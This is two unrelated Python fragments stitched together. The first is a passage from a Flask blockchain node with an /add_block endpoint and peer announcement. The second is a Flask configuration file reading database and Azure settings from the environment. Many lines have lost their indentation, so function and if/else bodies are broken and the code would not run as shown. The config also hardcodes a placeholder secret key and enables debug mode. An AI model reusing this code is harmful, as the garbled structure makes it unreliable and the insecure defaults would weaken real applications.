    return False
# Creates a new endpoint, and binds the function to the URL.
@app.route("/add_block", methods=["POST"])
# Adds a block mined by a user to the node's chain.
def validate_and_add_block():
block_data = request.get_json()
    block = Block(block_data["index"],
                  block_data["transactions"],
                  block_data["timestamp"],
                  block_data["previous_hash"])
proof = block_data["hash"]
added = blockchain.add_block(block, proof)
if not added:
insert_audit_trail(None,"System","System", "The block was discarded by the node.")
return "The block was discarded by the node.", 400
insert_audit_trail(None,"System","System", "The block was added to the chain.")
return "The block was added to the chain.", 201
# Announces to the network once a block has been mined, should always be called after validate_and_add_block().
# Other blocks can simply verify the PoW and add it to their respective chains.
def announce_new_block(block):
for peer in peers:
url = "http://{0}/add_block".format(peer)
        headers = {'Content-Type': "application/json"}
        # The receiving node's request.get_json() needs the JSON content type.
        requests.post(url, data=json.dumps(block.__dict__, sort_keys=True), headers=headers)
# Runs the Flask web app.
app.run(port=8000, debug=True)
|
import os
from dotenv import load_dotenv
load_dotenv()
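# The keys this config expects to find in the environment / .env file
# (names inferred from the os.getenv calls below; values are illustrative):
#   FLASK_ENV=development
#   DATABASE_URL=postgresql+psycopg2://user:pass@localhost:5432/dbname
#   db_user=..., db_pass=..., db_host=...
#   AZURE_STORAGE_CONNECTION_STRING=..., AZURE_STORAGE_REMOTE=...
#   SUBSCRIPTION_KEY=..., ENDPOINT=...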
SECRET_KEY = 'development key' # keep this key secret during production
if os.getenv('FLASK_ENV') == 'development':
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')
else: # production
db_user = os.getenv('db_user')
db_pass = os.getenv('db_pass')
db_host = os.getenv('db_host')
db_port = '5432'
db_name = 'pinterest_dev'
SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://{}:{}@{}:{}/{}?sslmode=require".format(db_user, db_pass, db_host, db_port, db_name)
SQLALCHEMY_TRACK_MODIFICATIONS = False
DEBUG = True
AZURE_STORAGE_CONNECTION_STRING = os.getenv('AZURE_STORAGE_CONNECTION_STRING')
AZURE_STORAGE_REMOTE = os.getenv("AZURE_STORAGE_REMOTE")
SUBSCRIPTION_KEY = os.getenv('SUBSCRIPTION_KEY')
ENDPOINT = os.getenv('ENDPOINT')
|